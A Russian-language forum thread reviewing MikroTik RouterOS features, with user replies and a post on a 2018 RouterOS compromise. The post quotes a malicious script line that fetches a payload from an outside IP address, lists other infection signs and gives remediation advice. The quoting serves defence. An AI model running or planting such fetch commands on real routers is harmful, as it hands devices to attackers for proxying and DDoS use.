MikroTik

[Maikll]

MikroTik

Было бы незаслуженным не упомянуть об этом программном роутере, тем более что по своим возможностям он легко "делает" большинство других, но, увы, требует за это денег.

RouterOS MikroTik - изначально это специализированная unix-подобная операционная система для оборудования MikroTik RouterBOARD.

Однако она может быть установлена на обычном компьютере, превратив его в интернет-шлюз со всеми необходимыми функциями - маршрутизация, брандмауэр, контроль пропускной способности, работа с беспроводными сетями, VPN-сервер и многое другое.

Требования к оборудованию впечатляют, эта система с легкостью может быть установлена как на старенький компьютер с первым "пнем", так и на современное "железо". RouterOS поддерживает установку на IDE, SATA и USB устройства хранения информации, в том числе HDD, CF и SD карты и SSD диски, потребуется по крайней мере 64Mb дискового пространства.

Поддерживается огромное количество сетевого оборудования, даже такое как 802.11a/b/g/n беспроводные карты или 3G модемы.

Функциональность, как я уже отметил выше, на высоте:

Функции для работы с протоколом TCP/IP :

* Firewall и NAT – мощные настройки фильтрации пакетов (применимо к P2P соединениям), прекрасная реализация SNAT и DNAT, возможность классификации пакетов по:

o MAC-адресу источника;

o IP адресам (возможность задания сетей);

o диапазонам портов;

o IP протоколам;

o опциям протоколов (ICMP типам, TCP флагам и MSS);

o интерфейсам;

o внутренним цепочкам маркированных пакетов;

o ToS (DSCP);

o по содержимому пакетов;

o по размеру пакетов и др;

* Routing – статическая маршрутизация, multi-path маршрутизация, маршрутизация на основе политик(совмещённая с файерволом), реализация следующих протоколов динамической маршрутизации: RIP v1 / v2, OSPF v2, BGP v4;

* Управление качеством обслуживания QoS – возможность динамического управления полосой пропускания. Задания минимальной, максимальной и Burst скорости для IP, протокола, подсети, порта, цепочки, маркированной в файерволе. Возможность выбрать тип очереди. Доступны следующие возможные: PCQ, RED, SFQ, FIFO. Релизация осуществлена с помощью пакета HTB;

* Возможности HotSpot – возможность построение plug&play точек коллективного пользования Internet на основе встроеных средств HotSpot с аутентификацией на RADIUS сервере. Создание walled-garden зон, задания скорости, времени работы клиента и пр;

* Протоколы PTP туннелей - PPTP, PPPoE и L2TP с возможностями PAP, CHAP, MSCHAPv1 и MSCHAPv2 авторизации, RADIUS аутентификации и управления доступом, MPPE шифрования, PPPoE компрессии, управления полосой пропускания и использования диффиренцированных правил файервола;

* Создание простых туннелей - IP2IP туннели, EoIP (Ethernet over IP);

* Использование IPsec - IP security AH и ESP протоколы. MODP Diffie-Hellman группы 1,2,5. MD5 и SHA1 алгоритмы кеширования. DES, 3DES, AES-128, AES-192, AES-256 алгоритмы шифрования. Perfect Forwarding Secrecy (PFS) MODP группы 1,2,5;

* Proxy – встроеный FTP и HTTP/HTTPS кэширующий прокси сервер, прозрачное DNS и HTTP проксирование. Реализация SOCKS протокола, возможность задания ACL (Access Control Lists), построение кэширующих сетей с помощью возможности parent proxy;

* DHCP – базовая реализация DHCP сервера и DHCP релея, DHCP клиента, возможность резервирования адресов, поддержка RADIUS;

* VRRP – реализация VRRP протокола;

* UPnP - поддержка Universal Plug-and-Play;

* NTP - Network Time Protocol сервер и клиент. Возможности синхронизации с GPS системой;

* Monitoring/Accounting – мониторинг IP трафика в реальном времени. Логирование действией файервола, действий пользователя и поведения системы в целом;

* SNMP – доступ к функциям SNMP в режиме "только чтение";

* M3P - MikroTik Packet Packer Protocol механизм компрессии трафика и увеличения пропускной способности интерфейсов в целом;

* MNDP - MikroTik Neighbor Discovery Protocol. Поддержка Cisco Discovery Protocol (CDP);

* Tools – встроеные сетевые утилиты для мониторинга и проверки текущего состояния сети.

Функции для работы со вторым уровнем OSI:

* Беспроводные сети – поддержка IEEE802.11a/b/g беспроводных клиентов и точек доступа. Создание Wireless Distribution System (WDS), виртуальных точек доступа. Реализация 40 и 104-битного шифрования с WEP и WPA аутентификацией клиентов. Возможность задания ACL. Авторизация клиентов на RADIUS сервере. Поддержка роуминга и Access Point мостов;

* Bridge – возможность создания мостов между интерфейсами с фильтрацией проходящего трафика;

* VLAN – поддержка IEEE802.1q Virtual LAN на Ethernet и беспроводных интерфейсах, множественных VLAN-ов и построение VLAN-мостов;

* Synchronous - V.35, V.24, E1/T1, X.21, DS3 (T3), протоколы PPP, Cisco HDLC, Frame Relay;

* Asynchronous - serial PPP dial-in / dial-out; PAP, CHAP, MSCHAPv1 и MSCHAPv2 протоколы авторизации, RADIUS авторизация и аккаунтинг. Модемные пулы до 128 портов. Возможность создания интерфейсов с вызовом по требованию;

* ISDN - ISDN dial-in / dial-out с PAP, CHAP, MSCHAPv1 и MSCHAPv2 протоколами авторизации;

* RADIUS-авторизация и управление доступом на основе правил Radius сервера;

* SDSL – поддержка Single-line DSL.

Что же касается способов настройки, то сабж поддерживает несколько методов - локально, последовательная консоль, Telnet, SSH, GUI приложение Winbox (только для OS Windows) а также простой web интерфейс.

В случае отсутствия доступа на уровне IP RouterOS поддерживает доступ на MAC уровне, через MAC Telnet или Winbox.

Из плюсов данной системы стоит отметить большое количество документации в сети, причем и на русском языке.

Бесплатная лицензия, к слову сказать, существует, но для нее возможности существенно ограничены. Хотите получить что-то посущественнее - придется раскошелится.

И в продолжение несколько ссылок на обзорные статьи по RouterOS:

Установка RouterOS Mikrotik: система работает, администратор отдыхает

Делим Интернет или QoS на Mikrotik

Объединяем офисы с помощью Mikrotik

Настраиваем биллинг UTM с Mikrotik

[ntoolsua]

сегодня Микротик завоевал уже весомую долю рынка сетевого оборудования. Ведь реально хорошие у них роутеры. Их операционная система хоть и немного сложная простому обывателю, но все равно их техника хороша.

[Indemion]

Купил Mikrotik RB941-2nD-TC. Всё настроил без проблем и PPOE и Wifi. Проблема заключается в том, что после отключения роутера от сети все настройки сбрасываются и приходится перенастраивать всё заново  - бегать с патч-кордом и прочее !! 

Это мой первый микротик, поэтому думаю что батарейка в нем села или вообще не предусмотрена, или в настройках можно где-то включить  ??

Что скажете ?

 

[Loader]

что-то не так с микротиком. В нём сохраняются все настройки в реальном времени и после возобновления питания восстанавливаются.

[Indemion]

Проблема исчезла после обновления прошивки...

[Loader]

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.

 

Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.

 

Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533